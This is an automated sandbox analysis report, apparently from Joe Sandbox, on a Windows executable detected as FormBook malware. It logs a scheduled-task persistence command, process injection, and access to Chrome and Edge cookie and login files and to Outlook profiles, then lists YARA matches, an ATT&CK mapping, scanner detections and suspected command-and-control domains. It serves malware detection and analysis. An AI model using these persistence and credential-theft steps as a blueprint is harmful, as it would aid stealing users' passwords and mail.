Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TBsjWljiCpR" /XML "C:\Users\user\AppData\Local\Temp\tmp1454.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Process created: C:\Users\user\Desktop\FGGx944Qu7.exe "C:\Users\user\Desktop\FGGx944Qu7.exe"	Jump to behavior
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Process created: C:\Users\user\Desktop\FGGx944Qu7.exe "C:\Users\user\Desktop\FGGx944Qu7.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TBsjWljiCpR" /XML "C:\Users\user\AppData\Local\Temp\tmp350B.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Process created: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe "C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe"	Jump to behavior
Source: C:\Program Files (x86)\ATqfrwJeiSEkHpSwLmQcLcKjItaMjYnOwempnyfloVJBHkJly\usFxdnRPYjnb.exe	Process created: C:\Windows\SysWOW64\SearchProtocolHost.exe "C:\Windows\SysWOW64\SearchProtocolHost.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"

Source: usFxdnRPYjnb.exe, 0000000F.00000000.1869517968.0000000001360000.00000002.00000001.00040000.00000000.sdmp, usFxdnRPYjnb.exe, 0000000F.00000002.2862677083.0000000001360000.00000002.00000001.00040000.00000000.sdmp, usFxdnRPYjnb.exe, 00000013.00000000.2032350481.00000000019E1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: usFxdnRPYjnb.exe, 0000000F.00000000.1869517968.0000000001360000.00000002.00000001.00040000.00000000.sdmp, usFxdnRPYjnb.exe, 0000000F.00000002.2862677083.0000000001360000.00000002.00000001.00040000.00000000.sdmp, usFxdnRPYjnb.exe, 00000013.00000000.2032350481.00000000019E1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: usFxdnRPYjnb.exe, 0000000F.00000000.1869517968.0000000001360000.00000002.00000001.00040000.00000000.sdmp, usFxdnRPYjnb.exe, 0000000F.00000002.2862677083.0000000001360000.00000002.00000001.00040000.00000000.sdmp, usFxdnRPYjnb.exe, 00000013.00000000.2032350481.00000000019E1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: usFxdnRPYjnb.exe, 0000000F.00000000.1869517968.0000000001360000.00000002.00000001.00040000.00000000.sdmp, usFxdnRPYjnb.exe, 0000000F.00000002.2862677083.0000000001360000.00000002.00000001.00040000.00000000.sdmp, usFxdnRPYjnb.exe, 00000013.00000000.2032350481.00000000019E1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: }Program Manager

Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Queries volume information: C:\Users\user\Desktop\FGGx944Qu7.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Queries volume information: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\FGGx944Qu7.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AFE5D244A8D1194230FF479FE2F897BBCD7A8CB4 Blob

Jump to behavior

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 8.2.FGGx944Qu7.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.FGGx944Qu7.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000010.00000002.2863758312.0000000003070000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2861231272.0000000002A20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1946159228.0000000001510000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1945331228.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2863668034.0000000003030000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2863047851.0000000004760000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1948193173.0000000003810000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\SearchProtocolHost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\SearchProtocolHost.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Jump to behavior

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 8.2.FGGx944Qu7.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.FGGx944Qu7.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000010.00000002.2863758312.0000000003070000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2861231272.0000000002A20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1946159228.0000000001510000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1945331228.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2863668034.0000000003030000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2863047851.0000000004760000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1948193173.0000000003810000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	412 Process Injection	1 Masquerading	1 OS Credential Dumping	121 Security Software Discovery	Remote Services	1 Email Collection	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 DLL Side-Loading	1 Scheduled Task/Job	1 Modify Registry	LSASS Memory	2 Process Discovery	Remote Desktop Protocol	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 Abuse Elevation Control Mechanism	111 Disable or Modify Tools	Security Account Manager	41 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	1 Data from Local System	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	1 DLL Side-Loading	41 Virtualization/Sandbox Evasion	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	3 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	412 Process Injection	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Deobfuscate/Decode Files or Information	Cached Domain Credentials	13 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Abuse Elevation Control Mechanism	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	4 Obfuscated Files or Information	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	22 Software Packing	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	1 DLL Side-Loading	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
FGGx944Qu7.exe	62%	ReversingLabs	Win32.Trojan.Nekark
FGGx944Qu7.exe	67%	Virustotal		Browse
FGGx944Qu7.exe	100%	Avira	HEUR/AGEN.1304432
FGGx944Qu7.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	100%	Avira	HEUR/AGEN.1304432
C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	62%	ReversingLabs	Win32.Trojan.Nekark
C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	67%	Virustotal		Browse

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Link
www.oobzxod2xn.cc	2%	Virustotal	Browse
td-ccm-neg-87-45.wixdns.net	0%	Virustotal	Browse
www.drapples.club	1%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
https://www.chiark.greenend.org.uk/~sgtatham/putty/0	0%	URL Reputation	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe
